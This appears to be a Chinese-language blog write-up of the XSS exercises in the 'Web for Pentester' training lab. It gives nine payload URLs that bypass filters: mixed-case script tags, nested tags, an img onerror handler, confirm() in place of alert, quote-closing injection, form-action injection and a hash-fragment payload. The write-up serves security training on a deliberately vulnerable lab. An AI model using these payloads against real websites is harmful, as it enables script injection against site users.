web for pentester xss

日期:2020-09-12

XSS

  • example1

DOM 型XSS 直接注入

/xss/example1.php?name=<script>alert("xxx")</script>
  • example2

DOM 型XSS 直接注入 没反应说明有过滤 首字母大写试试注入成功

/xss/example2.php?name=<Script>alert("xxx")</Script>
  • example3

DOM 型XSS 直接注入 没反应说明有过滤 首字母大写发现没效果 过滤掉了script标签 所以绕过一下使得过滤一次之后一样可以注入

/xss/example3.php?name=<scr<script>ipt>alert(111)</SC</script>RIPT>
  • example4

输入之前的poc发现直接返回error 应该是判断了script标签 所以只有跟换其他标签触发,例如img标签的onerror函数

/xss/example3.php?name=<img%20src=""%20%20onerror=alert("111")>
  • example5

输入alert直接报错,可以使用其他的弹出框window.confirm("sometext");window.prompt("sometext","defaultText");

/xss/example5.php?name=<script>window.confirm("xss")</script>
  • example6

通过f12 发现变量被复制给了a,所以可以直接闭合截断

/xss/example6.php?name=";alert(111);"
  • example7

通过f12 发现变量被复制给了a,所以可以直接闭合截断 与上面一题有区别的是这次是单引号闭合

/xss/example7.php?name=hacker%27;%20alert(111);%27
  • example8
    通过看F12 可以看到action中的连接就是url,所以可以尝试form表单截断
/xss/example8.php/"><script>alert("xss")</script>
  • example9

默认url 是显示#hacker 所以是#后面的内容是注入点 但是这个只有在ie上才有效,当然也有可能有别的解题思路

/xss/example9.php#<\script>alert(1)<\/script>
posted @ 2020-09-13 21:22  童小哥总是不开心。  阅读(164)  评论(0编辑  收藏  举报